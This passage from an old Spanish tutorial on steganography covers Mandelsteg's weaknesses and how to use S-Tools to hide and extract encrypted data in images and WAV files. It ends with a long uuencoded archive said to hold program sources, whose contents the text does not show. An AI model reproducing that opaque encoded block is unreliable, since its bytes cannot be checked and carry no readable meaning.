Extrae  los  datos  almacenados  en el bit 4 de los pixels de imagen.gif y los
guarda en datos.txt


Cuestiones de seguridad

	La pregunta es:  es  seguro el uso de Mandelsteg? Pues la realidad es
que no (pero... esperad, leed  primero  las razones y despues encontrareis la
solucion!).

	 Las razones:

	 Los parametros de  encriptacion  si  se  saben  de  puede  reproducir
igualmente  por  lo  que  no  conviene  usar dos veces las mismas coordenadas,
ademas estar cambiando continuamente es un  poco  engorroso  porque al otro le
tienes que decir las coordenadas usando un medio de comunicacion seguro. 



      ͻ
                               S-TOOLS                             
      ͼ

	S-Tools,  escrito  por Andrew Brown, es un programa para  Windows  que
permite encriptar y ocultar  datos  en  archivos .wav o en imagenes en formato
.bmp o .gif.

	Este programa es freeware, asi que  puede  distribuirse libremente, si
bien  hay  que  tener  en  cuenta que, dado que incluye la  implementacion  de
diversos  algoritmos  criptograficos,   por  lo   que  puede  estar  sujeto  a
restricciones en algunos paises.


	Es  un  buen  programa  con un nivel de seguridad aceptable, ideal 
para
windows.

	En  cuanto  a  los  algoritmos  criptograficos,  se  dispone de cuatro
algoritmos de clave unica: IDEA, DES, Triple DES y MDC.


MANEJO

	El manejo es muy simple, y se realiza en combinacion con el Explorador
de  Windows  95  o arrastrando los ficheros. Seleccionamos en el Explorador el
archivo wav o de  imagen en el que queremos ocultar los datos y lo arrastramos
a la ventana de S-Tools. S-Tools  abrira  el  archivo  y  lo  mostrara  en una
ventana,  indicando ademas el numero de bytes que puede ocultar como maximo. A
continuacion, seleccionamos  en  el  Explorador  el  archivo  a  ocultar  y lo
arrastramos  a  la  ventana  del  archivo "matriz"  que  esta en la ventana de
S-Tools. Si tenemos activada la opcion de compresion, se comprimira el archivo
de datos, y despues S-Tools mostrara un dialogo en el que nos pide la password
para la encriptacion y nos da a elegir el algoritmo criptografico a utilizar.
En caso de que el archivo "matriz" sea una imagen, aparecera  otro dialogo con
diversas opciones referentes a como ha de manipular S-Tools los  colores de la
imagen. Una vez hecho esto, comienza el proceso esteganografico, cuyo progreso
podemos  seguir  en la ventana Actions de S-Tools. Una vez terminado,  podamos
grabar el archivo,  haciendo  click  con  el  boton derecho del raton sobre la
ventana  del  archivo  y  elegiendo  la  opcion "Save" o "Save as..." del menu
contextual.

	Para extraer  los datos, bastara con arrastrar el archivo a la ventana
de S-Tools. Una vez lo haya abierto, pulsamos el boton derecho del raton sobre
la  ventana del archivo y seleccionamos la opcion "Reveal". S-Tools nos pedira
la password  y el algoritmo criptografico empleados al ocultar los datos, y si
la password es correcta, extraera los datos.

	Nota: Los ejemplos se han escrito con la sintaxis de los sistemas Unix
(Linux, HP-UX, System V...), excepto el de S-Tools.


	Aqui  pongo  los fuentes de algunos programas para que vayais probando
el resto los podreis encontrar en la web de raregazz, aqui estan uucodificados

	Nota: Documento basado en el original de Jose Luis Martin Mas.

				>>>> TEXTO <<<<

begin 644 Texto.tar.gz
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
